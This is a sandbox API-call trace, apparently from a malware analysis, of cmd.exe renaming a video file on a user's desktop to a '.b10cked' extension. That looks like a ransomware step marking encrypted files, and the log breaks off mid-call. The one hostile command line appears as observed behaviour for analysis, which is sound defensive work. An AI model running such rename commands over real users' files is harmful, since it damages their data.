SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0231.924] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.924] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0231.926] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.926] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0231.927] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.927] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.928] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.928] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0231.930] 
_get_osfhandle (_FileHandle=0) returned 0x3 [0231.930] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0231.942] GetEnvironmentStringsW () returned 0x4a01c8* [0231.942] FreeEnvironmentStringsW (penv=0x4a01c8) returned 1 [0231.942] GetEnvironmentStringsW () returned 0x4a01c8* [0231.942] FreeEnvironmentStringsW (penv=0x4a01c8) returned 1 [0231.942] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eee74 | out: phkResult=0x2eee74*=0x40) returned 0x0 [0231.942] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x0, lpData=0x2eee80*=0x0, lpcbData=0x2eee78*=0x1000) returned 0x2 [0231.942] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x4, lpData=0x2eee80*=0x1, lpcbData=0x2eee78*=0x4) returned 0x0 [0231.942] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x0, lpData=0x2eee80*=0x1, lpcbData=0x2eee78*=0x1000) returned 0x2 [0231.942] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x4, lpData=0x2eee80*=0x0, lpcbData=0x2eee78*=0x4) returned 0x0 [0231.942] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x4, lpData=0x2eee80*=0x40, lpcbData=0x2eee78*=0x4) returned 0x0 [0231.942] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x4, lpData=0x2eee80*=0x40, lpcbData=0x2eee78*=0x4) returned 0x0 
[0231.943] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x0, lpData=0x2eee80*=0x40, lpcbData=0x2eee78*=0x1000) returned 0x2 [0231.943] RegCloseKey (hKey=0x40) returned 0x0 [0231.943] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eee74 | out: phkResult=0x2eee74*=0x40) returned 0x0 [0231.943] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x0, lpData=0x2eee80*=0x40, lpcbData=0x2eee78*=0x1000) returned 0x2 [0231.943] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x4, lpData=0x2eee80*=0x1, lpcbData=0x2eee78*=0x4) returned 0x0 [0231.943] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x0, lpData=0x2eee80*=0x1, lpcbData=0x2eee78*=0x1000) returned 0x2 [0231.943] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x4, lpData=0x2eee80*=0x0, lpcbData=0x2eee78*=0x4) returned 0x0 [0231.943] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x4, lpData=0x2eee80*=0x9, lpcbData=0x2eee78*=0x4) returned 0x0 [0231.943] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x4, lpData=0x2eee80*=0x9, lpcbData=0x2eee78*=0x4) returned 0x0 [0231.943] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", 
lpReserved=0x0, lpType=0x2eee7c, lpData=0x2eee80, lpcbData=0x2eee78*=0x1000 | out: lpType=0x2eee7c*=0x0, lpData=0x2eee80*=0x9, lpcbData=0x2eee78*=0x1000) returned 0x2 [0231.943] RegCloseKey (hKey=0x40) returned 0x0 [0231.943] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863bf [0231.943] srand (_Seed=0x5b8863bf) [0231.943] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi.b10cked\"" [0231.943] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi.b10cked\"" [0231.943] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.944] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4a1928, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0231.944] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0231.944] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0231.944] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.944] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0231.944] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0231.944] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0231.944] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0231.944] _wcsicmp (_String1="PROMPT", _String2="DATE") 
returned 12 [0231.944] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0231.944] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0231.944] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0231.944] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0231.945] GetEnvironmentStringsW () returned 0x4a2318* [0231.945] FreeEnvironmentStringsW (penv=0x4a2318) returned 1 [0231.945] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.945] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.945] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0231.945] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0231.945] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0231.945] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0231.945] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0231.945] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0231.945] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0231.945] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0231.945] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2efc40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.945] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2efc40, lpFilePart=0x2efc3c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2efc3c*="Desktop") returned 0x18 [0231.945] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.945] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef9bc | out: lpFindFileData=0x2ef9bc) returned 0x4a0058 [0231.946] FindClose (in: hFindFile=0x4a0058 | out: hFindFile=0x4a0058) returned 1 [0231.946] 
FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef9bc | out: lpFindFileData=0x2ef9bc) returned 0x4a0058 [0231.946] FindClose (in: hFindFile=0x4a0058 | out: hFindFile=0x4a0058) returned 1 [0231.946] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef9bc | out: lpFindFileData=0x2ef9bc) returned 0x4a0058 [0231.946] FindClose (in: hFindFile=0x4a0058 | out: hFindFile=0x4a0058) returned 1 [0231.946] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.946] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0231.946] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0231.946] GetEnvironmentStringsW () returned 0x4a2b38* [0231.946] FreeEnvironmentStringsW (penv=0x4a2b38) returned 1 [0231.947] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.947] GetConsoleOutputCP () returned 0x1b5 [0231.978] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.978] GetUserDefaultLCID () returned 0x409 [0231.984] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0231.984] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efd80, cchData=128 | out: lpLCData="0") returned 2 [0231.984] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efd80, cchData=128 | out: lpLCData="0") returned 2 [0231.984] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efd80, cchData=128 | out: lpLCData="1") returned 2 [0231.984] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0231.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0231.985] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0231.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0231.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0231.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0231.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0231.985] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0231.985] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0231.985] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0231.985] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0231.986] GetConsoleTitleW (in: lpConsoleTitle=0x490910, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.010] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.010] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0232.011] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0232.011] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0232.012] _wcsicmp (_String1="move", _String2=")") returned 68 [0232.012] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0232.012] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0232.012] _wcsicmp (_String1="IF", _String2="move") returned -4 [0232.012] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0232.012] _wcsicmp (_String1="REM", _String2="move") returned 5 [0232.012] _wcsicmp 
(_String1="REM/?", _String2="move") returned 5 [0232.016] GetConsoleTitleW (in: lpConsoleTitle=0x2efa78, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.072] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0232.072] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0232.072] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0232.072] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0232.072] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0232.072] _wcsicmp (_String1="move", _String2="CD") returned 10 [0232.072] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0232.072] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0232.072] _wcsicmp (_String1="move", _String2="REN") returned -5 [0232.072] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0232.072] _wcsicmp (_String1="move", _String2="SET") returned -6 [0232.072] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0232.072] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0232.072] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0232.072] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0232.072] _wcsicmp (_String1="move", _String2="MD") returned 11 [0232.072] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0232.073] _wcsicmp (_String1="move", _String2="RD") returned -5 [0232.073] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0232.073] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0232.073] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0232.073] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0232.073] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0232.073] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0232.073] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0232.073] _wcsicmp (_String1="move", _String2="VER") returned -9 [0232.073] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0232.073] 
_wcsicmp (_String1="move", _String2="EXIT") returned 8 [0232.073] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0232.073] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0232.073] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0232.073] _wcsicmp (_String1="move", _String2="START") returned -6 [0232.073] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0232.073] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0232.073] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0232.077] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.077] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.077] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef834, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef82c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef82c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0232.078] _wcsnicmp 
(_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.078] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.079] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.079] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.079] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0232.079] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0232.079] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0232.079] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0232.079] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0232.079] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0232.079] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0232.079] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0232.079] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0232.079] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0232.079] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0232.079] _wcsnicmp (_String1="/Y", 
_String2="/Y", _MaxCount=0x2) returned 0 [0232.079] _wcsicmp (_String1="OXP9RC~1.AVI", _String2=".") returned 65 [0232.079] _wcsicmp (_String1="OXP9RC~1.AVI", _String2="..") returned 65 [0232.080] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\oxp9rc~1.avi")) returned 0x20 [0232.080] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1eb8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.080] SetErrorMode (uMode=0x0) returned 0x0 [0232.080] SetErrorMode (uMode=0x1) returned 0x0 [0232.080] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI", nBufferLength=0x104, lpBuffer=0x2ef1bc, lpFilePart=0x2ef1a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI", lpFilePart=0x2ef1a4*="OXP9RC~1.AVI") returned 0x33 [0232.080] SetErrorMode (uMode=0x0) returned 0x1 [0232.080] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00")) returned 0x12 [0232.080] _wcsicmp (_String1="OXP9RC~1.AVI", _String2=".") returned 65 [0232.080] _wcsicmp (_String1="OXP9RC~1.AVI", _String2="..") returned 65 [0232.081] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\oxp9rc~1.avi")) returned 0x20 [0232.081] SetErrorMode (uMode=0x0) returned 0x0 [0232.081] SetErrorMode (uMode=0x1) returned 0x0 [0232.081] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI", nBufferLength=0x104, lpBuffer=0x2ef638, lpFilePart=0x2ef3d0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI", lpFilePart=0x2ef3d0*="OXP9RC~1.AVI") returned 0x33 [0232.081] SetErrorMode (uMode=0x0) returned 0x1 [0232.081] SetErrorMode (uMode=0x0) returned 0x0 [0232.081] SetErrorMode (uMode=0x1) returned 0x0 
[0232.081] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi.b10cked", nBufferLength=0x104, lpBuffer=0x2ef840, lpFilePart=0x2ef3d0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi.b10cked", lpFilePart=0x2ef3d0*="OXP9rCEqmjhd9gNfz.avi.b10cked") returned 0x44 [0232.081] SetErrorMode (uMode=0x0) returned 0x1 [0232.081] SetLastError (dwErrCode=0x0) [0232.081] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\oxp9rceqmjhd9gnfz.avi.b10cked")) returned 0xffffffff [0232.081] GetLastError () returned 0x2 [0232.081] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI", fInfoLevelId=0x1, lpFindFileData=0x2eed4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eed4c) returned 0x490f30 [0232.081] FindNextFileW (in: hFindFile=0x490f30, lpFindFileData=0x2eed4c | out: lpFindFileData=0x2eed4c) returned 0 [0232.082] GetLastError () returned 0x12 [0232.082] FindClose (in: hFindFile=0x490f30 | out: hFindFile=0x490f30) returned 1 [0232.084] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9RC~1.AVI", fInfoLevelId=0x1, lpFindFileData=0x4a1c58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4a1c58) returned 0x490f30 [0232.084] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi.b10cked", nBufferLength=0x104, lpBuffer=0x2eefe4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi.b10cked", lpFilePart=0x0) returned 0x44 [0232.084] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi", nBufferLength=0x104, lpBuffer=0x2eefe4, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi", lpFilePart=0x0) returned 0x3c [0232.084] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\oxp9rceqmjhd9gnfz.avi")) returned 0x20 [0232.084] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\oxp9rceqmjhd9gnfz.avi"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\OXP9rCEqmjhd9gNfz.avi.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\oxp9rceqmjhd9gnfz.avi.b10cked"), dwFlags=0x3) returned 1 [0232.085] FindClose (in: hFindFile=0x490f30 | out: hFindFile=0x490f30) returned 1 [0232.085] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2eef98 | out: _Buffer=" 1") returned 9 [0232.085] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.085] GetFileType (hFile=0x7) returned 0x2 [0232.144] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.144] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eef24 | out: lpMode=0x2eef24) returned 1 [0232.145] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.145] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2eef58 | out: lpConsoleScreenBufferInfo=0x2eef58) returned 1 [0232.147] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0232.147] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2eef98 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0232.147] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2eef7c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, 
